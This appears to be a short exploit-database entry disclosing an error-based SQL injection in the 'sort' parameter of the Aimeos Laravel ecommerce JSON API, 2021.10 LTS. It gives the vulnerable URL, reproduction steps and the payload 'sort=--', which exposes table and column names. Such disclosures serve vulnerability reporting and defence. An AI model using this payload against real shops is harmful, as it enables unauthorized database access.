Share
## https://sploitus.com/exploit?id=PACKETSTORM:165033
# Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection  
# Date: 20/11/2021  
# Exploit Author: Ilker Burak ADIYAMAN  
# Vendor Homepage: https://aimeos.org  
# Software Link: https://aimeos.org/laravel-ecommerce-package  
# Version: Aimeos 2021.10 LTS  
# Tested on: MacOSX  
  
*Description:*  
  
The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api.  
  
==================== 1. SQLi ====================  
  
https://127.0.0.1/default/jsonapi/review?sort=-ctime  
  
The "sort" parameter is vulnerable to SQL injection, reveals table and column names.  
  
step 1 : Copy json api GET request above.  
step 2 : Change sort parameter value to --  
  
----------------------------------------------------------------------  
Parameter: sort (GET)  
Type: error based  
Title: GET parameter 'sort' appears to be injectable  
Payload: sort=--